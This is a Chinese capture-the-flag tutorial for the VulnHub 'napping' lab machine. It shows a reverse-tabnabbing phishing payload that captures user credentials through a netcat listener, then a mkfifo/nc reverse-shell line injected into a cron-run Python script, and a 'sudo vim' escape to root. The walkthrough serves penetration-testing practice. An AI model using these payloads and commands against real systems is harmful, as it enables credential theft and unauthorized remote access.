napping靶机教程(超详细讲解)

第一步搭建环境

下载地址:https://download.vulnhub.com/napping/napping-1.0.1.ova

下载完成后,直接用VM打开,

这样的话点一下重试就好了。

 然后右击虚拟机设置网络连接改成nat模式

第二步信息收集 

然后做上角编辑,虚拟网络编辑器看一下自己是哪个网段

 然后打开我们的kali,使用nmap工具扫一下它的具体IP,注意这里kali也必须是nat模式。

nmap 192.168.109.1/24

发现没有扫到。这里我们的操作是没有任何问题的,考虑应该是靶机网卡配置的问题,一般靶机都会有这个问题。

我们先把靶机关机。

然后,开机长按shift建,(注意手速一定要快)然后按e键进入修改界面找到 ro ******** 这一部分,可能有所差异,如果ro后面有字符 则直接在后面添加 rw single init=/bin/bash 如果没有字符则直接将ro改为 rw single init=/bin/bash。

ctrl+x保存

再按e修改网络配置文件 /etc/network/interfaces 文件(没有的话去/etc/netplan目录下的yaml文件),如果/输不出来就一级级目录跳转。将里面的内容修改为下图所示。然后重启虚拟机。

重启,我们再去用kali的nmap工具扫描一下

这下我们正常的扫到了靶机的IP,注意大部分靶机扫不到IP都是网卡配置的问题,所以网卡配置这里一定要学会。

然后我们去访问我们的靶机

 第三步web渗透

这里给了一个登录框,并且还给了我们一个注册账号功能。我先注册登录一下,看看有什么东西可以利用。

可以看到这个是一个博客推广网站,有这个提交链接功能,我们先随便提交一个链接,看看他的功能到底是什么。然后再找出他有什么漏洞。

 这里我是测试,随便输入了一个百度网址,提交完了以后,他多了一个Here按钮,点一下直接跳到了我们的输入的响应页面

既然他会跳转页面的话,我们就可以写一个钓鱼页面,让他跳转到我们是页面上。原理如下;

我们到kali里写一个b.html文件内容如下;其中里面的IP地址为你的kali的ip

<!DOCTYPE html>
<html>
<body>
    <script>
        if(window.opener) window.opener.parent.location.replace('http://192.168.109.128:7777/a.html');
        if(window.opener  != window) window.opener.parent.location.replace('http://192.168.109.128:7777/a.html');
    </script>
</body>
</html>
  • 这段代码的目的是:​​如果当前页面是被另一个页面(比如浏览器新标签页或弹出窗口)打开的,就强行把那个“父页面”的网址改掉​​,让它跳转到一个攻击者控制的恶意网站(http://192.168.109.128:7777/a.html)。
  • ​​攻击者的目标​​:让用户以为自己还在原来的网站(比如社交平台),但实际上已经被骗到了钓鱼网站。

关键概念解析​​

​​(1) window.opener 是什么?​​

  • 当你通过以下方式打开一个新页面时:
    • 点击一个链接:<a href="新页面.html" target="_blank">(新标签页打开)
    • 或用 JavaScript:window.open("新页面.html")
  • ​​新页面(子页面)​​ 可以通过 window.opener 访问​​打开它的那个页面(父页面)​​的 window 对象。
  • ​​这意味着子页面可以操控父页面的行为​​,比如修改它的网址、读取它的内容(如果没防护)。

​​(2) window.opener.parent.location.replace() 是什么?​​

  • window.opener:子页面访问父页面的 window 对象。
  • parent.location.replace():修改父页面的网址(类似 window.location.replace(),但 parent 通常用于 iframe 嵌套场景)。
  • ​​这里可能是混淆写法​​,因为 window.opener 本身已经是父页面的 window 对象,直接 window.opener.location.replace() 更常见。

​​(3) if(window.opener != window) 的作用​​

  • 检查当前页面是否是通过 window.open() 或 <a target="_blank"> 打开的(即 window.opener 存在且不等于自身)。
  • 如果是,则执行 URL 替换。

然后我们再创建一个a.html,内容如下;

<html>
        <body>
                aaaaaa
        </body>
</html>

 尽量把这两个文件,创建在一个好找的目录下,推荐是根目录

kali开启7777端口监听

nc -lvp 7777

 

然后用python开启一个临时的http服务,目的是让网站能访问到(注意开这个的时候,监听不要动,再开一个窗口)

python3 -m http.server 8000

然后去靶机那个功能那里,让他跳转我们的页面

http://192.168.109.128:8000/b.html

提交的时候有的靶机会卡,稍等一会。

 

可以看到咱们监听的端口,监听到了daniel和它的密码

 密码这里需要url解码一下

这里我们知道了账号和密码然后我们使用ssh服务连接一下,可以用连接工具连一下

 咱们去翻找一下发现咱们的权限还是普通用户,再认真翻找一下

第四步提权

发现一个python脚本,这个脚本又打开了一个site_status.txt文件,每两分钟执行一次

然后我们用vim再里面查一条语句来反弹shell

先把刚才kali监听打开

import os

os.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.109.128 7777 >/tmp/f")

 等两分钟

kali弹出shell后用下面命令提权

sudo vim -c ':!/bin/bash'
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值